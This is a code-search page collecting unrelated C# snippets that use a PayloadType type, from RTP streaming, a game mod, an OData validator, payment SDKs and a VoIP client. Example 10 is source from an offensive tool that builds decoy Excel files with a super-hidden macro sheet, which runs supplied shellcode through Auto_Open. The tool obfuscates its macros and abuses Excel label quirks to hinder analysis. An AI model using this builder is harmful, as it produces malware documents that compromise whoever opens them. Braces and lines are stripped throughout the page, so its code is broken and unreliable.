Exemplo n.º 1
        /// <summary>
        /// Class factory for creating all RtpSenders
        /// </summary>
        internal static RtpSender CreateInstance(IRtpSession session, string name, PayloadType pt,
                                                  Hashtable priExns, Hashtable paraPay)
            if(priExns != null)
                // Fec RtpSenders
                string fecData = (string)priExns[Rtcp.PEP_FEC];
                if(fecData != null)
                    string[] args = fecData.Split(new char[]{':'});
                    ushort cDataPx = ushort.Parse(args[0]);
                    ushort cFecPx = ushort.Parse(args[1]);

                    // Validates in case private extensions were modified elsewhere than method below
                    if(cFecPx == 0)
                        throw new ArgumentOutOfRangeException("cFecPx", cFecPx, "Must be >= 1");

                    if(cDataPx == 0)
                        // Frame based Fec
                        return new RtpSenderFFec(session, name, pt, priExns, cFecPx);
                        // Constant Fec
                        return new RtpSenderCFec(session, name, pt, priExns, cDataPx, cFecPx);

            // Regular old RtpSender
            return new RtpSender(session, name, pt, priExns, paraPay);
Exemplo n.º 2
 /// <summary>
 /// Constructs a frame for Sending
 /// </summary>
 public RtpFrame(uint packetSize, PayloadType payloadType, Hashtable payloadPara, uint timeStamp)
     this.packetSize = packetSize;
     this.payloadType = payloadType;
     this.payloadPara = payloadPara;
     this.timeStamp = timeStamp;
Exemplo n.º 3
        public PayloadChannel CreateChannel(PayloadType aType)
            PayloadChannel aChannel = new PayloadChannel(aType);

            return aChannel;
 public QueryParameters(
   PayloadType? payload,
   IScopeParameters scopeParameters,
   IEnumerable<string> fields)
   this.Payload = payload;
   this.ScopeParameters = scopeParameters;
   this.Fields = fields;
Exemplo n.º 5
 private bool checkPayloadTypeAttributeApproxEq(PayloadType type)
     switch (type)
         case PayloadType.Altitude:
         case PayloadType.Terrain_altitude:
             return Math.Abs(Attributes.prev_altitude - FlightGlobals.ActiveVessel.altitude) < Attributes.ALTITUDE_APPROX_EQUALITY;
         case PayloadType.Apoapsis:
             return Math.Abs(Attributes.prev_apoapsis - FlightGlobals.ActiveVessel.orbit.ApA) < Attributes.ALTITUDE_APPROX_EQUALITY;
         case PayloadType.Apoapsis_r:
             return Math.Abs(Attributes.prev_apoaps_r - FlightGlobals.ActiveVessel.orbit.ApR) < Attributes.ALTITUDE_APPROX_EQUALITY;
         case PayloadType.Orb_spd:
             return Math.Abs(Attributes.prev_orb_spd - FlightGlobals.ActiveVessel.obt_speed) < Attributes.SPEED_APPROX_EQUALITY;
         case PayloadType.Periapsis:
             return Math.Abs(Attributes.prev_periapsis - FlightGlobals.ActiveVessel.orbit.PeA) < Attributes.ALTITUDE_APPROX_EQUALITY;
         case PayloadType.Periapsis_r:
             return Math.Abs(Attributes.prev_periaps_r - FlightGlobals.ActiveVessel.orbit.PeR) < Attributes.ALTITUDE_APPROX_EQUALITY;
         case PayloadType.Stage:
             return Attributes.prev_stage == FlightGlobals.ActiveVessel.currentStage;
         case PayloadType.Surf_spd:
             return Math.Abs(Attributes.prev_surf_spd - FlightGlobals.ActiveVessel.srfSpeed) < Attributes.SPEED_APPROX_EQUALITY;
         case PayloadType.T_t_apo:
             return Math.Abs(Attributes.prev_t_t_apo - FlightGlobals.ActiveVessel.orbit.timeToAp) < Attributes.GAME_TIME_APPROX_EQUAL;
         case PayloadType.T_t_peri:
             return Math.Abs(Attributes.prev_t_t_peri - FlightGlobals.ActiveVessel.orbit.timeToPe) < Attributes.GAME_TIME_APPROX_EQUAL;
         case PayloadType.Targ_dist:
             // TODO
             return true;
         case PayloadType.Targ_spd:
             return Math.Abs(Attributes.prev_targ_spd - FlightGlobals.ship_tgtSpeed) < Attributes.SPEED_APPROX_EQUALITY;
         case PayloadType.SOI_Num:
             return Attributes.prev_soi == ICCHelpers.SOI_to_SOI_Number(FlightGlobals.ActiveVessel.orbit.referenceBody.name);
         case PayloadType.Latitude:
             return Math.Abs(Attributes.prev_latitude - FlightGlobals.ActiveVessel.latitude) < Attributes.DEGREES_APPROX_EQUALITY;
         case PayloadType.Longitude:
             return Math.Abs(Attributes.prev_longitude - FlightGlobals.ActiveVessel.longitude) < Attributes.DEGREES_APPROX_EQUALITY;
         case PayloadType.Orbital_period:
             return Math.Abs(Attributes.prev_orb_per - FlightGlobals.ActiveVessel.orbit.period) < Attributes.GAME_TIME_APPROX_EQUAL;
         case PayloadType.Gee_force:
             return Math.Abs(Attributes.prev_gee_force - FlightGlobals.ActiveVessel.geeForce) < Attributes.SPEED_APPROX_EQUALITY;
             print("[ICC] ERROR. Trying to check attribute equality with invalid payload type");
             return true;
Exemplo n.º 6
Arquivo: Util.cs Projeto: xornand/bond
        internal static InMemFrame NewPayLoad(ulong conversationId, PayloadType payloadType, IBonded layerData,
                                                IMessage message, TaskCompletionSource<IMessage> taskSource)
            var headers = new SimpleInMemHeaders
                conversation_id = conversationId,
                payload_type = payloadType

            var payload = new InMemFrame
                headers = headers,
                layerData = layerData,
                message = message,
                outstandingRequest = taskSource

            return payload;
Exemplo n.º 7
        /// <summary>
        /// Filters rules based on payload type and flag of media link entry.
        /// </summary>
        /// <param name="rules">The collection of input rules</param>
        /// <param name="payloadType">Payload type</param>
        /// <param name="isMediaLinkEntry">Flag of media link entry</param>
        /// <param name="projection">Flag of projected request</param>
        /// <returns>The subset of input rules that meet the conditions of payload type and media link entry flag</returns>
        private static IEnumerable<Rule> SelectRules(this IEnumerable<Rule> rules, PayloadType payloadType, bool isMediaLinkEntry, bool projection)
            rules = from r in rules
                   where !r.PayloadType.HasValue || r.PayloadType == payloadType
                   select r;

            if (payloadType == PayloadType.Entry)
                rules = from r in rules
                        where !r.IsMediaLinkEntry.HasValue || r.IsMediaLinkEntry.Value == isMediaLinkEntry
                        select r;

            if (payloadType == PayloadType.Entry || payloadType == PayloadType.Feed)
                rules = from r in rules
                        where !r.Projection.HasValue || r.Projection.Value == projection
                        select r;

            return rules;
Exemplo n.º 8
        /// <summary>
        /// get details of the stream...raw data and start tiume etc
        /// set up the stream senders associated with us. we have n, one active and the rest acting as buffers
        /// </summary>
        public StreamPlayer( RtpSession session, int newStreamID, ConferencePlayerPC cppc)
            int maxFrameSize, maxFrameCount, maxBufferSize;

            // This occasionally throws due to bad data.  Let ConferencePlayer handle it.
            DBHelper.GetStreamStatistics( newStreamID, out this.firstStreamTicks, out maxFrameSize, out maxFrameCount, out maxBufferSize);

            streamID = newStreamID;
            totalFramesSent = 0;
            totalBytesSent = 0;
            totalLateness = 0;
            buffers = new BufferPlayer[Constants.BuffersPerStream];
            perfCounter = cppc;

            string payload;
            DBHelper.GetStreamAndParticipantDetails( streamID, out name, out payload, out cname, out privExtns );
            streamPayload = (PayloadType)Enum.Parse( typeof(PayloadType), payload, true );

            // for delayed buffers (late joiners), we create the rtpSender later
            this.rtpSession = session;

            Trace.WriteLine("Playing back stream: "+streamID+"; payload: "+streamPayload+"; name: "+ (cname + " : " +name));

            // buffer n buffers worth of data
            long startingTick = this.firstStreamTicks;
            for ( int i = 0; i < buffers.Length; i++)
                buffers[i] = new BufferPlayer( streamID, maxFrameSize, maxFrameCount, maxBufferSize);
                buffers[i].Populate( startingTick );
                startingTick = buffers[i].LastTick + 1;


            // first stream is initially active
            activeBufferIndex = 0;
            activeBuffer = buffers[activeBufferIndex];
Exemplo n.º 9
 internal RtpStreamFec(RtpListener rtpListener, uint ssrc, string ipaddress, SdesData sdes, PayloadType pt) 
     : base(rtpListener, ssrc, ipaddress, sdes, pt)
     this.getBufferHandler = rtpListener.GetBufferCallback;
Exemplo n.º 10
        /// <summary>
        /// Generate an Excel Document with a hidden macro sheet that will execute code described by the payload argument.
        /// </summary>
        /// <param name="decoyDocument">File path to the base Excel 2003 sheet that should be visible to users.</param>
        /// <param name="payload">Either binary shellcode or a newline separated list of Excel Macros to execute</param>
        /// <param name="payload64Bit">Binary shellcode of a 64bit payload, payload-type must be Shellcode</param>
        /// <param name="payloadType">Specify if the payload is binary shellcode or a macro list. Defaults to Shellcode</param>
        /// <param name="preamble">Preamble macro code to include with binary shellcode payload type</param>
        /// <param name="macroSheetName">The name that should be used for the macro sheet. Defaults to Sheet2</param>
        /// <param name="outputFileName">The output filename used for the generated document. Defaults to output.xls</param>
        /// <param name="debugMode">Set this to true to make the program wait for a debugger to attach. Defaults to false</param>
        /// <param name="method">Which method to use for obfuscating macros. Defaults to ObfuscatedCharFunc. </param>
        public static void Build(FileInfo decoyDocument, FileInfo payload, FileInfo payload64Bit, string preamble,
                                 PayloadType payloadType   = PayloadType.Shellcode,
                                 string macroSheetName     = "Sheet2", string outputFileName = "output.xls", bool debugMode = false,
                                 SheetPackingMethod method = SheetPackingMethod.ObfuscatedCharFunc)
            if (decoyDocument == null || payload == null)
                Console.WriteLine("decoy-document and payload must be specified in Build mode. Run build -h for usage instructions.");

            //Useful for remote debugging
            if (debugMode)
                Console.WriteLine("Waiting for debugger to attach");
                while (!Debugger.IsAttached)
                Console.WriteLine("Debugger attached");

            List <BiffRecord> defaultMacroSheetRecords = GetDefaultMacroSheetRecords();

            string decoyDocPath = decoyDocument.FullName;

            WorkbookStream wbs          = LoadDecoyDocument(decoyDocPath);
            List <string>  preambleCode = new List <string>();

            if (preamble != null)
                string preambleCodePath = new FileInfo(preamble).FullName;
                preambleCode = new List <string>(File.ReadAllLines(preambleCodePath));

            if (wbs.GetAllRecordsByType <SupBook>().Count > 0)
                throw new NotImplementedException("Please use a decoy document with no existing Labels.");

            WorkbookEditor wbe = new WorkbookEditor(wbs);

            wbe.AddMacroSheet(defaultMacroSheetRecords, macroSheetName, BoundSheet8.HiddenState.SuperHidden);

            List <string> macros = null;

            byte[] binaryPayload   = null;
            byte[] binary64Payload = null;

            //TODO make this customizable
            int rwStart     = 0;
            int colStart    = 0xA0;
            int dstRwStart  = 0;
            int dstColStart = 0;

            int curRw  = rwStart;
            int curCol = colStart;

            switch (payloadType)
            case PayloadType.Shellcode:
                macros        = MacroPatterns.GetX86GetBinaryLoaderPattern(preambleCode, macroSheetName);
                binaryPayload = File.ReadAllBytes(payload.FullName);

                if (payload64Bit != null && payload64Bit.Exists)
                    binary64Payload = File.ReadAllBytes(payload64Bit.FullName);


            case PayloadType.Macro:
                macros = MacroPatterns.ImportMacroPattern(File.ReadAllLines(payload.FullName).ToList());

                throw new ArgumentException(string.Format("Invalid PayloadType {0}", payloadType),

            if (binaryPayload != null && binaryPayload.Length > 0)
                wbe.SetMacroBinaryContent(binaryPayload, curRw, curCol, dstRwStart, dstColStart + 1, method);
                curRw = wbe.WbStream.GetFirstEmptyRowInColumn(colStart) + 1;

                if (rwStart > 0xE000)
                    curRw   = 0;
                    curCol += 1;

                if (binary64Payload != null && binary64Payload.Length > 0)
                    wbe.SetMacroBinaryContent(binary64Payload, curRw, curCol, dstRwStart, dstColStart + 2, method);
                    curRw = wbe.WbStream.GetFirstEmptyRowInColumn(colStart) + 1;

                    if (rwStart > 0xE000)
                        curRw   = 0;
                        curCol += 1;

                    macros = MacroPatterns.GetMultiPlatformBinaryPattern(preambleCode, macroSheetName);
            wbe.SetMacroSheetContent(macros, curRw, curCol, dstRwStart, dstColStart, method);

            if (method == SheetPackingMethod.CharSubroutine || method == SheetPackingMethod.AntiAnalysisCharSubroutine)
                ushort charInvocationRw  = 0xefff;
                ushort charInvocationCol = 0x9f;
                wbe.AddLabel("\u0000", charInvocationRw, charInvocationCol, true, true);

                //Abuse a few comparison "features" in Excel
                //1. Null bytes are ignored at the beginning and start of a label.
                //2. Comparisons are not case sensitive, A vs a or Ḁ vs ḁ
                //3. Unicode strings can be "decomposed" - ex: Ḁ (U+1E00) can become A (U+0041) - ◌̥ (U+0325)
                //4. The Combining Grapheme Joiner (U+034F) unicode symbol is ignored at any location in the string in SET.NAME functions
                wbe.AddLabel(UnicodeHelper.UnicodeArgumentLabel, null, true, true);
                //Using lblIndex 2, since that what var has set for us
                    FormulaHelper.CreateCharInvocationFormulaForLblIndex(charInvocationRw, charInvocationCol, 2));

            wbe.AddLabel("Auto_Open", rwStart, colStart);


            ExcelDocWriter writer     = new ExcelDocWriter();
            string         outputPath = AssemblyDirectory + Path.DirectorySeparatorChar + outputFileName;

            Console.WriteLine("Writing generated document to {0}", outputPath);
            writer.WriteDocument(outputPath, wbe.WbStream);
Exemplo n.º 11
        /// <summary>
        /// Connect up a branch of the graph for network sending.  Source filter should already be in the graph.
        /// DVSplitter and compressor may also already be connected, but for uncompressed cases, the Splitter
        /// may not be there yet.
        /// </summary>
        /// <param name="rtpSender"></param>
        /// <param name="payload"></param>
        public override void RenderNetwork(RtpSender rtpSender, PayloadType payload)
            if (rtpSender == null) {
                string msg = Strings.NullRtpSenderError;
                throw new ArgumentNullException(Strings.RtpSender, msg);

            //Splitter may not yet be added in network scenarios without compression
            if (!this.AddDVSplitter()) {
                throw new ApplicationException("Failed to add DV Splitter");

            networkContext = true;

            if (payload == PayloadType.dynamicVideo) {
                videoRenderer = (Renderer)Filter.NetworkRenderer();
                ((IRtpRenderer)videoRenderer.BaseFilter).Initialize2(rtpSender, this.rtpRendererFlags);
                iGB.AddFilter(videoRenderer.BaseFilter, videoRenderer.FriendlyName);
                iGB.Connect(videoCompressor != null ? videoCompressor.OutputPin : splitterVideoOut,
            else if (payload == PayloadType.dynamicAudio) {
                audioRenderer = (Renderer)Filter.NetworkRenderer();
                ((IRtpRenderer)audioRenderer.BaseFilter).Initialize2(rtpSender, this.rtpRendererFlags);
                iGB.AddFilter(audioRenderer.BaseFilter, audioRenderer.FriendlyName);
                iGB.Connect(audioCompressor != null ? audioCompressor.OutputPin : splitterAudioOut,
Exemplo n.º 12
 public virtual void RenderNetwork(RtpSender rtpSender, PayloadType payload)
Exemplo n.º 13
        /// <summary>
        /// Creates an RtpSender with Forward Error Correction
        /// This RtpSender sends the data requested by the user, plus some extra data in order to
        /// help recover lost data.  The recovery packets are sent per the specified ratio of
        /// cDataPx : cFecPx, e.g. 3:1 means for every 3 data packets we will send 1 fec packet.
        /// This means we can lose any 1 of the 4 packets and recover the data.  3:2 means we
        /// can lose any 2 of the 5 and still recover the data.
        /// It takes 1 FEC packet to recover 1 lost data packet.  It is important to balance the
        /// extra CPU and network bandwidth against the reliability of the data.  Increasing either
        /// CPU or network bandwidth too much may cause worse data loss than not correcting at all.
        /// If the FEC ratio uses only 1 FEC packet (2:1, 3:1, etc.) we use an XOR algorithm, which
        /// is very fast.  If the ratio uses more than one FEC packet (3:2, 5:3, etc.), we use the 
        /// Reed-Solomon algorithm.  Reed-Solomon is more complicated and therefore requires more 
        /// CPU, however it allows you to recover from a broader range of loss patterns.
        /// </summary>
        /// <param name="Name">string Friendly Name of the device/sender of this RtpStream</param>
        /// <param name="payloadType">Rtp Payload Type</param>
        /// <param name="priExns">Private extensions for this RtpSender/Stream</param>
        /// <param name="dataPackets">Count of data packets to protect with FEC packets</param>
        /// <param name="perFECPackets">Count of FEC packets to protect data, 1:1 recovery</param>
        public RtpSender CreateRtpSenderFec(string name, PayloadType pt, Hashtable priExns, ushort cDataPx, ushort cFecPx)

            RtpSender rtpSender = RtpSender.CreateInstance(this, name, pt, priExns, cDataPx, cFecPx);

            return rtpSender;
Exemplo n.º 14
        internal RtpSenderCFec(IRtpSession session, string name, PayloadType pt, Hashtable priExns, 
            ushort cDataPx, ushort cFecPx)
            : base(session, name, pt, priExns, null)
            pcFecType = 1;

            this.cDataPx = cDataPx;
            this.cFecPx = cFecPx;

Exemplo n.º 15
 public byte[] GetNextWrittenChunk(PayloadType type) => _writtenChunks.GetValueOrDefault(type, new Queue <List <byte> >(0)).Dequeue().ToArray();
Exemplo n.º 16
        private void timerTick(Object sender, EventArgs args)
            LinphoneCall call = ((InCallModel)ViewModel).GetCurrentCall();

            if (call == null)

            startTime = (DateTimeOffset)call.CallStartTimeFromContext;
            DateTimeOffset now     = DateTimeOffset.Now;
            TimeSpan       elapsed = now.Subtract(startTime);
            var            hh      = elapsed.Hours;
            var            ss      = elapsed.Seconds;
            var            mm      = elapsed.Minutes;

            Status.Text = hh.ToString("00") + ":" + mm.ToString("00") + ":" + ss.ToString("00");

            string audioPayloadType       = "";
            string audioDownloadBandwidth = "";
            string audioUploadBandwidth   = "";
            string videoPayloadType       = "";
            string videoDownloadBandwidth = "";
            string videoUploadBandwidth   = "";

            LinphoneCallParams param = call.GetCurrentParamsCopy();

            ((InCallModel)ViewModel).MediaEncryption = param.MediaEncryption.ToString();

            LinphoneCallStats audioStats = null;

                audioStats = call.AudioStats;
            catch { }

            if (audioStats != null)
                audioDownloadBandwidth       = String.Format("{0:0.00}", audioStats.DownloadBandwidth);
                audioUploadBandwidth         = String.Format("{0:0.00}", audioStats.UploadBandwidth);
                ((InCallModel)ViewModel).ICE = audioStats.IceState.ToString();

            PayloadType audiopt = param.UsedAudioCodec;

            if (audiopt != null)
                audioPayloadType = audiopt.MimeType + "/" + audiopt.ClockRate;

            if (param.VideoEnabled)
                LinphoneCallStats videoStats = call.VideoStats;
                if (videoStats != null)
                    videoDownloadBandwidth = String.Format("{0:0.00}", videoStats.DownloadBandwidth);
                    videoUploadBandwidth   = String.Format("{0:0.00}", videoStats.UploadBandwidth);

                PayloadType videopt = param.UsedVideoCodec;
                if (videopt != null)
                    videoPayloadType = videopt.MimeType;
                Windows.Foundation.Size receivedVideoSize = param.ReceivedVideoSize;
                String NewReceivedVideoSize = String.Format("{0}x{1}", receivedVideoSize.Width, receivedVideoSize.Height);
                String OldReceivedVideoSize = ((InCallModel)ViewModel).ReceivedVideoSize;
                if (OldReceivedVideoSize != NewReceivedVideoSize)
                    ((InCallModel)ViewModel).ReceivedVideoSize = String.Format("{0}x{1}", receivedVideoSize.Width, receivedVideoSize.Height);
                    ((InCallModel)ViewModel).IsVideoActive     = false;
                    if (NewReceivedVideoSize != "0x0")
                        ((InCallModel)ViewModel).IsVideoActive = true;
                Windows.Foundation.Size sentVideoSize = param.SentVideoSize;
                ((InCallModel)ViewModel).SentVideoSize        = String.Format("{0}x{1}", sentVideoSize.Width, sentVideoSize.Height);
                ((InCallModel)ViewModel).VideoStatsVisibility = Visibility.Visible;
                ((InCallModel)ViewModel).VideoStatsVisibility = Visibility.Collapsed;

            string downloadBandwidth = audioDownloadBandwidth;

            if ((downloadBandwidth != "") && (videoDownloadBandwidth != ""))
                downloadBandwidth += " - ";
            if (videoDownloadBandwidth != "")
                downloadBandwidth += videoDownloadBandwidth;
            ((InCallModel)ViewModel).DownBandwidth = String.Format("{0} kb/s", downloadBandwidth);
            string uploadBandwidth = audioUploadBandwidth;

            if ((uploadBandwidth != "") && (videoUploadBandwidth != ""))
                uploadBandwidth += " - ";
            if (videoUploadBandwidth != "")
                uploadBandwidth += videoUploadBandwidth;
            ((InCallModel)ViewModel).UpBandwidth = String.Format("{0} kb/s", uploadBandwidth);
            string payloadType = audioPayloadType;

            if ((payloadType != "") && (videoPayloadType != ""))
                payloadType += " - ";
            if (videoPayloadType != "")
                payloadType += videoPayloadType;
            ((InCallModel)ViewModel).PayloadType = payloadType;
Exemplo n.º 17
 public bool HasPendingChunks(PayloadType type) => _writtenChunks.TryGetValue(type, out var pendingChunks) && pendingChunks.Count > 0;
Exemplo n.º 18
 /// <summary>
 /// Remove everything downstream from the DVSplitter for the specified payload type
 /// </summary>
 /// <param name="payload"></param>
 public override void RemoveFiltersDownstreamFromSource(PayloadType payload)
Exemplo n.º 19
 /// <summary>
 /// Remove everything downstream from the DVSplitter for the specified payload type
 /// </summary>
 /// <param name="payload"></param>
 public override void RemoveCompressor(PayloadType payload)
Exemplo n.º 20
 public virtual void RenderNetwork(RtpSender rtpSender, PayloadType payload)
Exemplo n.º 21
 public static int getsize(PayloadType type)
     switch (type) {
     case PayloadType.Stage:
         return sizeof(int);
     case PayloadType.SOI_Num:
         return sizeof(byte);
     case PayloadType.Latitude:
     case PayloadType.Longitude:
         return sizeof(float);
         return sizeof(double);
Exemplo n.º 22
 protected override void PrepareSequence(ref ReadOnlySequence <byte> sequence, PayloadType payloadType)
Exemplo n.º 23
        /// <summary>
        /// // Whether Int64, Decimal or Count are formatted as string in entry or feed.
        /// </summary>
        /// <param name="jo">The response payload object.</param>
        /// <param name="type">The payload type of object.</param>
        /// <param name="odataCount">The odata.count annotation name.</param>
        /// <returns>true:Int64 or Decimal or feed count are formatted as string; false:otherwise; null: not applicable.</returns>
        private bool? IsInt64OrDecimalAsString(JObject jo, PayloadType type, string odataCount)
            bool? isInt64OrDecimalAsString = null;

            if (type == RuleEngine.PayloadType.Entry)
                foreach (JProperty jProp in jo.Children())
                    if (jProp.Name.EndsWith(Constants.V4OdataType) && !jProp.Name.Equals(Constants.V4OdataType)
                        && (jProp.Value.ToString().StripOffDoubleQuotes().Equals("#Decimal") || jProp.Value.ToString().StripOffDoubleQuotes().Equals("#Int64")))
                        if (((JProperty)jProp.Next).Value.Type == JTokenType.String)
                            isInt64OrDecimalAsString = true;
                            isInt64OrDecimalAsString = false;
            else if (type == RuleEngine.PayloadType.Feed)
                foreach (JProperty jp in jo.Children<JProperty>())
                    if (jp.Name.Equals(odataCount))
                        if (((JProperty)jp).Value.Type == JTokenType.String)
                            isInt64OrDecimalAsString = true;
                            isInt64OrDecimalAsString = false;

                foreach (JObject ob in (JArray)jo[Constants.Value])
                    bool? resultMiddle = IsInt64OrDecimalAsString(ob, RuleEngine.PayloadType.Entry, odataCount);

                    if (resultMiddle.HasValue)
                        isInt64OrDecimalAsString = resultMiddle;

                    if (isInt64OrDecimalAsString == false)

            return isInt64OrDecimalAsString;
Exemplo n.º 24
 protected override ValueTask SendAsync(PayloadType type, ReadOnlySequence <byte> sequence) => _sendHandler(this, type, sequence);
Exemplo n.º 25
        public RequestBase CreateRequest(HttpMethod httpMethod,
                                         string path,
                                         PayloadType payloadType,
                                         JObject payload,
                                         RequestOptions requestOptions)
            if (string.IsNullOrEmpty(path))
                throw new MercadoPagoRestException("Uri can not be an empty string.");

            if (httpMethod.Equals(HttpMethod.GET))
                if (payload != null)
                    throw new MercadoPagoRestException("Payload not supported for this method.");
            else if (httpMethod.Equals(HttpMethod.POST))
                //if (payload == null)
                //    throw new MercadoPagoRestException("Must include payload for this method.");
            else if (httpMethod.Equals(HttpMethod.PUT))
                if (payload == null)
                    throw new MercadoPagoRestException("Must include payload for this method.");
            else if (httpMethod.Equals(HttpMethod.DELETE))
                if (payload != null)
                    throw new MercadoPagoRestException("Payload not supported for this method.");

            RequestBase request = new RequestBase
                Request = (HttpWebRequest)WebRequest.Create(path)

            request.Request.Method = httpMethod.ToString();

            if (requestOptions == null)
                requestOptions = new RequestOptions();

            if (requestOptions.Timeout > 0)
                request.Request.Timeout = requestOptions.Timeout;

            if (!path.Contains("/oauth/token"))
                request.Request.Headers.Add("Authorization", $"Bearer {(!string.IsNullOrEmpty(requestOptions.AccessToken) ? requestOptions.AccessToken : MercadoPagoSDK.OAuthAccessToken)}");

            request.Request.Headers.Add("x-product-id", MercadoPagoSDK.ProductId);
            request.Request.Headers.Add("x-tracking-id", MercadoPagoSDK.TrackingId);

            if (requestOptions.CustomHeaders != null)
                foreach (KeyValuePair <string, string> header in requestOptions.CustomHeaders)
                    if (request.Request.Headers[header.Key] == null)
                        request.Request.Headers.Add(header.Key, header.Value);

            if (requestOptions.TrackHeaders != null)
                foreach (KeyValuePair <string, string> trackHeader in requestOptions.TrackHeaders)
                    if (request.Request.Headers[trackHeader.Key] == null && trackHeader.Value != null)
                        request.Request.Headers[trackHeader.Key] = trackHeader.Value;

            if (payload != null) // POST & PUT
                byte[] data;
                if (payloadType != PayloadType.JSON)
                    Dictionary <string, string> parametersDict = payload.ToObject <Dictionary <string, string> >();
                    StringBuilder parametersString             = new StringBuilder();
                    parametersString.Append(string.Format("{0}={1}", parametersDict.First().Key, parametersDict.First().Value));
                    foreach (KeyValuePair <string, string> value in parametersDict)
                        parametersString.Append(string.Format("&{0}={1}", value.Key, value.Value.ToString()));

                    data = Encoding.ASCII.GetBytes(parametersString.ToString());
                    data = Encoding.ASCII.GetBytes(payload.ToString());

                request.Request.UserAgent     = "MercadoPago DotNet MercadoPagoSDK/" + MercadoPagoSDK.Version;
                request.Request.ContentLength = data.Length;
                request.Request.ContentType   = payloadType == PayloadType.JSON ? "application/json" : "application/x-www-form-urlencoded";
                request.RequestPayload        = data;

            IWebProxy proxy = requestOptions.Proxy ?? (_proxy ?? MercadoPagoSDK.Proxy);

            request.Request.Proxy = proxy;

Exemplo n.º 26
 internal RtpSenderFec(IRtpSession session, string name, PayloadType pt, Hashtable priExns, Hashtable paraPay)
     base(session, name, pt, priExns, paraPay)
Exemplo n.º 27
 internal RtpSenderFFec(IRtpSession session, string name, PayloadType pt, Hashtable priExns, 
     ushort cFecPx)
     : base(session, name, pt, priExns, null)
     fecPercent = cFecPx;
     pcFecType = 2;
        public SlideStreamMgr(ArchiveTranscoderJob job, ArchiveTranscoderJobSegment segment,
                              LogMgr logMgr, double fps, int width, int height)
            this.job     = job;
            this.segment = segment;
            this.logMgr  = logMgr;

            if (width > 0 && height > 0)
                this.outputWidth  = width;
                this.outputHeight = height;

            this.ticksBetweenFrames = (long)((double)Constants.TicksPerSec / fps);

            uncompressedMT = getUncompressedMT(this.outputWidth, this.outputHeight, fps);
            cancel         = false;
            initialized    = false;
            pptInstalled   = Utility.CheckPptIsInstalled();

            if ((!DateTime.TryParse(segment.StartTime, out start)) ||
                (!DateTime.TryParse(segment.EndTime, out end)))
                throw(new System.Exception("Failed to parse start/end time"));

            this.nextFrameTime = start.Ticks;

            format  = Utility.StringToPresenterWireFormatType(segment.PresentationDescriptor.PresentationFormat);
            payload = Utility.formatToPayload(format);
            cname   = segment.PresentationDescriptor.PresentationCname;

            slideImageMgr = new SlideImageMgr(format, this.outputWidth, this.outputHeight);

            //Get the start time for the entire conference and use that to get streams.
            long confStart = DatabaseUtility.GetConferenceStartTime(payload, cname, start.Ticks, end.Ticks);

            if (confStart <= 0)
                logMgr.WriteLine("Warning: No conference exists in the database that matches this presentation: " + cname +
                                 " with PresentationFormat " + format.ToString());
                logMgr.ErrorLevel = 7;
                confStart         = start.Ticks;

            //Get the relevant stream_id's and create DBStreamPlayers for each.
            streamIDs = DatabaseUtility.GetStreams(payload, segment.PresentationDescriptor.PresentationCname, null, confStart, end.Ticks);
            DateTime sdt = new DateTime(confStart);

            Debug.WriteLine("***Conference start: " + sdt.ToString() + " end: " + end.ToString());
            if ((streamIDs == null) || (streamIDs.Length == 0))
                Debug.WriteLine("No presentation data found.");
                logMgr.WriteLine("Warning: No presentation data was found for the given time range for " +
                                 cname + " with PresentationFormat " + format.ToString());
                logMgr.ErrorLevel = 7;
                streamPlayers     = null;

            streamPlayers = new DBStreamPlayer[streamIDs.Length];
            for (int i = 0; i < streamIDs.Length; i++)
                streamPlayers[i] = new DBStreamPlayer(streamIDs[i], confStart, end.Ticks, payload);

            lookBehindDuration = 0;
            if (streamPlayers[0].Start < start)
                lookBehindDuration = ((TimeSpan)(start - streamPlayers[0].Start)).TotalSeconds;
Exemplo n.º 29
 public virtual void RemoveFiltersDownstreamFromSource(PayloadType payload)
Exemplo n.º 30
 public Header(ushort sender, ushort receiver, MessageType msgType, uint telegrammId, uint size, PayloadType type)
     : this()
     SenderId    = sender;
     ReceiverId  = receiver;
     MsgType     = msgType;
     TelegrammId = telegrammId;
     PayloadSize = size;
     PayloadType = type;
Exemplo n.º 31
 /// <summary>
 /// Remove everything downstream from the DVSplitter for the specified payload type
 /// </summary>
 /// <param name="payload"></param>
 public override void RemoveFiltersDownstreamFromSource(PayloadType payload)
        public async Task <MPAPIResponse> ExecuteRequestAsync(
            HttpMethod httpMethod,
            string path,
            PayloadType payloadType,
            JObject payload,
            int requestTimeout,
            int retries)
            System.Diagnostics.Trace.WriteLine("Payload " + httpMethod + " request to " + path + " : " + payload);

                if (string.IsNullOrEmpty(path))
                    throw new MPRESTException("Uri can not be an empty string.");

                ValidateMethodAndPayload(httpMethod, payload);

                var requestMethod = GetHttpMethod(httpMethod);
                var request       = new HttpRequestMessage(requestMethod, path);

                var client = new HttpClient();

                if (requestTimeout > 0)
                    client.Timeout = TimeSpan.FromSeconds(requestTimeout);

                request.Headers.Add("HTTP.USER_AGENT", $"Lexim MercadoPago .NET SDK v{SDK.Version}");

                if (payload != null)
                    string data;
                    if (payloadType != PayloadType.JSON)
                        var formParams =
                            payload.ToObject <Dictionary <string, string> >()
                            .Select(x => $"{x.Key}={x.Value}");

                        var parametersString =
                            string.Join("&", formParams);

                        data = parametersString;
                        data = payload.ToString();

                    var content = Encoding.ASCII.GetBytes(data);
                    request.Content = new ByteArrayContent(content);
                    request.Content.Headers.ContentLength = content.Length;
                    request.Content.Headers.ContentType   =
                        payloadType == PayloadType.JSON
                            ? new MediaTypeHeaderValue("application/json")
                            : new MediaTypeHeaderValue("application/x-www-form-urlencoded");

                while (true)
                        var response = await client.SendAsync(request);

                        var content = await response.Content.ReadAsByteArrayAsync();

                        return(new MPAPIResponse(httpMethod, request, payload, response, content));
                        if (--retries <= 0)
            catch (Exception ex)
                throw new MPRESTException(ex.Message, ex);
Exemplo n.º 33
 public virtual void RemoveFiltersDownstreamFromSource(PayloadType payload)
Exemplo n.º 34
 /// <summary>
 /// Constructs a frame for Sending
 /// </summary>
 public RtpFrame(uint packetSize, PayloadType payloadType, uint timeStamp)
     this.packetSize  = packetSize;
     this.payloadType = payloadType;
     this.timeStamp   = timeStamp;
Exemplo n.º 35
        public FrameFunctionality()
            // Testing PopFirstValue
            Console.WriteLine("Testing PopFirstValue:");
            FrameUtils frameUtils = new FrameUtils(Command.SUBSCRIBE, 123456789);

            frameUtils.AddVSKeyPairGetUtils("string_test", "true");
            frameUtils.AddVSKeyPairGetUtils("bytes_test", Encoding.UTF8.GetBytes("false"));

            Frame  frame      = frameUtils.Build();
            string falseValue = Encoding.UTF8.GetString(frame.PopFirstValue("bytes_test"));
